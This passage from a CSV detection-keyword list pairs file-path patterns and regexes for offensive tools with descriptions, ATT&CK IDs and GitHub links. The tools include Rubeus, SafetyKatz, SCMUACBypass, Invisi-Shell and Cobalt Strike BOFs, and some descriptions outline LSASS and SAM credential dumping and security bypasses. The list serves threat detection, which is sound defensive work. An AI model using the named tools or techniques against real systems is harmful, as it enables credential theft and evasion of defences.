Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*\RubeusRoast.cs*",".{0,1000}\\RubeusRoast\.cs.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*\ruler.exe*",".{0,1000}\\ruler\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*\run\john *",".{0,1000}\\run\\john\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*\run\john\*.*",".{0,1000}\\run\\john\\.{0,1000}\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*\run\john\*.com*",".{0,1000}\\run\\john\\.{0,1000}\.com.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*\run\john\*.pl*",".{0,1000}\\run\\john\\.{0,1000}\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*\run\john\*.py*",".{0,1000}\\run\\john\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*\RunasCs.cs*",".{0,1000}\\RunasCs\.cs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","0","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*\runasppl.py*",".{0,1000}\\runasppl\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\RunAsWinTcb\*",".{0,1000}\\RunAsWinTcb\\.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*\RunBOF.exe*",".{0,1000}\\RunBOF\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*\runcalc.dll*",".{0,1000}\\runcalc\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\runcmd.lua*",".{0,1000}\\runcmd\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\runcmd2.lua*",".{0,1000}\\runcmd2\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\Running_msf_revshell*",".{0,1000}\\Running_msf_revshell.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*\RunOF.exe*",".{0,1000}\\RunOF\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*\RunOF\bin\*",".{0,1000}\\RunOF\\bin\\.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*\RunPEinMemory.exe*",".{0,1000}\\RunPEinMemory\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\RunPEinMemory64.exe*",".{0,1000}\\RunPEinMemory64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\runswhide.lua*",".{0,1000}\\runswhide\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\RunWithPathAsAdmin.bat*",".{0,1000}\\RunWithPathAsAdmin\.bat.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*\RunWithRegistryNonAdmin.bat*",".{0,1000}\\RunWithRegistryNonAdmin\.bat.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*\rusthound.exe*",".{0,1000}\\rusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*\RustRedOps\*",".{0,1000}\\RustRedOps\\.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\RustRedOps-main*",".{0,1000}\\RustRedOps\-main.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\SafetyKatz*",".{0,1000}\\SafetyKatz.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*\SafetyKatz.exe*",".{0,1000}\\SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\sAINT-master.zip*",".{0,1000}\\sAINT\-master\.zip.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\SAM\.Sam-Full.txt*",".{0,1000}\\SAM\\\.Sam\-Full\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\samantha.txt",".{0,1000}\\samantha\.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","177","30","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" "*\sample_brc4.json*",".{0,1000}\?sample_sliver\.json.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*\sample_sliver.json*",".{0,1000}\?sample_sliver\.json.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*\SauronEye.exe*",".{0,1000}\\SauronEye\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\save_reg.hive*",".{0,1000}\\save_reg\.hive.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*\scan4all.exe*",".{0,1000}\\scan4all\.exe.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*\scan4all-main*",".{0,1000}\\scan4all\-main.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*\scanACLsResults.csv*",".{0,1000}\\scanACLsResults\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*\ScanInterception.ps1*",".{0,1000}\\ScanInterception\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\scan-network.py*",".{0,1000}\\scan\-network\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\SchTaskBackdoor.*",".{0,1000}\\SchTaskBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*\sc-loader.exe*",".{0,1000}\\sc\-loader\.exe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*\scmuacbypass.cpp*",".{0,1000}\\scmuacbypass\.cpp.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*\scmuacbypass.exe*",".{0,1000}\\scmuacbypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*\SCMUACBypass\*",".{0,1000}\\SCMUACBypass\\.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","8","1","88","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*\ScriptSentry.ps1*",".{0,1000}\\ScriptSentry\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*\ScriptSentry.psd1*",".{0,1000}\\ScriptSentry\.psd1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*\ScriptSentry.psm1*",".{0,1000}\\ScriptSentry\.psm1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*\ScriptSentry.txt*",".{0,1000}\\ScriptSentry\.txt.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*\scuffy.py*",".{0,1000}\\scuffy\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\sdb-explorer.exe*",".{0,1000}\\sdb\-explorer\.exe.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*\sdb-explorer.sln*",".{0,1000}\\sdb\-explorer\.sln.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*\SeatBelt.exe*",".{0,1000}\\SeatBelt\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*\Seatbelt.exe*",".{0,1000}\\Seatbelt\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Seatbelt.sln*",".{0,1000}\\Seatbelt\.sln.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - 